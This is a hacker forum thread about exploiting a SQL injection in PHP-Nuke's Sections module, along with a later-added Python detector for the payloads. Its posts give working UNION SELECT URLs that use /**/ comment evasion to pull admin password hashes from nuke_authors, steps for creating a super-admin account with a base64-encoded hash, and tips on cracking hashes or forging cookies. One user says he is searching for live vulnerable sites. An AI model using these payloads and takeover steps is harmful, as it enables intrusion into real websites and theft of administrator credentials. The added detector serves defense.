
migo
Hey Guys
I found a new exploit for PHP Nuke but unfortunately it didn't work as posted by the author in rootlab.ru
the problem exists in the Sections module in the variable secid
here is the original exploit that doesn't work
CODE

http: // target/modules.php? name=Sections&op;=listarticles&secid; =-1 UNION SELECT 0,0, pwd, 0,0 FROM nuke_authors/*


the correct one modified by me which is working great in all nuke versions is

CODE

http://www.victim.com/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/0,0,pwd,0,0/**/FROM/**/nuke_authors

the previous code will display the encrypted hash of the admin account and will evade the stupid protector system as well!

another working one
CODE

http://www.victim.com/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors



Note: PHP Nuke is Sh*t
i'll never stop asking people to stop using it!

Best Regards
migo
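
Added example, not part of the original thread and not PHP-Nuke or its protector's code: a Python log check showing why a filter that looks for `UNION SELECT` separated by whitespace misses the `/**/` form above, and how comment stripping plus an integer check on `secid` flags both variants. The function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# /**/ and /* ... */ act as whitespace in MySQL; a trailing unterminated /*
# comments out the rest of the statement.
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*\Z", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
INTEGER = re.compile(r"-?\d+\Z")
NUMERIC_PARAMS = {"secid"}  # the parameter the post names as the injection point

def normalize(value):
    """Replace SQL comments with a space and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).strip()

def inspect(url):
    """Return (parameter, reason) findings for one requested URL."""
    findings = []
    # parse_qs also URL-decodes each value once
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name in NUMERIC_PARAMS and not INTEGER.match(value):
                findings.append((name, "non-integer value"))
            if UNION_SELECT.search(normalize(value)):
                findings.append((name, "UNION SELECT after comment stripping"))
    return findings

# Constructed sample requests (not real log data).
SAMPLES = [
    "/modules.php?name=Sections&op=listarticles&secid=3",
    "/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors",
    "/modules.php?name=Sections&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors/*",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect(url) or "clean", url)
```

The integer check is the stronger control: a `secid` that must match `-?\d+` rejects every variant in this thread regardless of how the keywords are spaced.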
MpR
niceee
10x

but i need a good new sploit 4 phpbb :|

got 1 ?
migo
soon will be
but the old sploit in the priv_msg value is still working perfect
i do my best to notify everyone i know using phpbb and have this vuln exist

we learn attacks to well defend ourselves

F34R
Old and new sploits alike are welcome here... some of us missed em when they were here before.
Thanks d00d
x1`
when you exploit these php server can u get root and upload files and stuff?
migo
QUOTE (Dickybob20 @ May 16 2004, 07:41 PM)
when you exploit these php server can u get root and upload files and stuff?

it depends on the modules installed in PHP Nuke, but theoretically within most known modules you can include files from the server and you can upload files to the writable folders
but in general it depends on many things

d0whc3r
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx
whiskah
QUOTE (d0whc3r @ May 17 2004, 07:07 AM)
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx

u have to crack the md5 password using an md5 cracker ..before u can login..I posted an exploit by waraxe earlier on another thread that automatically adds a god admin ..
Mandarins
QUOTE (d0whc3r @ May 16 2004, 11:07 PM)
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx

I am not a pro but such questions are l#me. Man you are in status of a member and asking question like: how to use copy/paste

If U can't crack the pass, just construct a cookie with it, please don't ask how to do it (use governmentsecurity.org search/ google or there is section 4 the beginners).

No offence but still...
migo
QUOTE (d0whc3r @ May 16 2004, 11:07 PM)
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx

hey
first base64 encode the username and the admin md5 hash that u get
http://www.isecurelabs.com/outils/base64/

second use the resulting output to create the super user account with this url

http://localhost/nuke71/admin.php?op=AddAu...nsuper=1&admin=

at the last of the above link put after the word "admin=" the base64 encode result that u get in the previous step

use the username "me" and the password "pass"
boooooom!
easy access to admin panel

didn't I tell you that php nuke is sh*t and they fixing it with another one! lol
setthesun
Very good work, thanks a lot.

Also I improved SQL a bit to prevent some possible non-admin MD5 data;


SQL;
/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
migo
awesome
nuorder
QUOTE (MpR @ May 17 2004, 12:09 AM)
niceee
10x

but i need a good new sploit 4 phpbb :|

got 1 ?

hahahah now i know why MpR wanted this
liquidSilver
PHP-nuke is sure the devil.
Imps2
Thnx for post but this is what I keep getting all the time

Sorry, this Module isn't active!


Greetz Imps2
cagontoo
doesn´t work for me x(
nuorder
QUOTE
Thnx for post but this is what I keep getting all the time

Sorry, this Module isn't active!


Greetz Imps2

it means that they haven't activated that module, the error message says it all

QUOTE
doesn´t work for me  x(

good
Imps2
Jup thnxs for advice now I'm googling on "modules .php sections" and I find working ones


Greetz Imps2